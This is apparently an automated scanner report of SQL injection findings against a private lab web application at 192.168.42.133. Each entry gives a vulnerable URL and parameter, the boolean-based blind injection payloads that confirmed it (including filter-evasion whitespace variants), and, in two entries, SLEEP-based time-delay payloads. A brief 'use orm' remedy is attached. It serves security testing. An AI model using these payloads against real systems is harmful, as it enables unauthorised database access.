Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	95577=95577
	and	26525=26525
	or	17594=17594#
	and	6628=6629
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	95577=95577
	and	26525=26525
	or	17594=17594#
	and	6628=6629
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'93351'='93351
'/**/and/**/'6302'='6302
'/**/or/**/84016=84016#
'/**/and/**/'75230'='75231
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	95577=95577
	and	26525=26525
	or	17594=17594#
	and	6628=6629
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 
and
77530=77530

and
73999=73999

or
82567=82567#

and
11342=11343
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'54000'='54000
'+and+'81074'='81074
'+or+80202=80202#
'+and+'59317'='59318
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example100.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example101.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example103.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example102.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example104.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example105.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example107.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example106.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example108.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example110.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example109.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example111.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example112.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example114.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example116.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example113.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example115.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example117.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example118.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example119.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example120.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example121.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example122.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example123.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example124.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example126.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example125.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example127.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example128.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example129.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example130.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example131.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example132.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example133.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example134.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example137.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example135.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example136.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example138.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example139.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example140.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example141.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'24461'='24461
'	and	'93417'='93417
'	or	98218=98218#
'	and	'10882'='10883
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: use orm
Database: unknown
---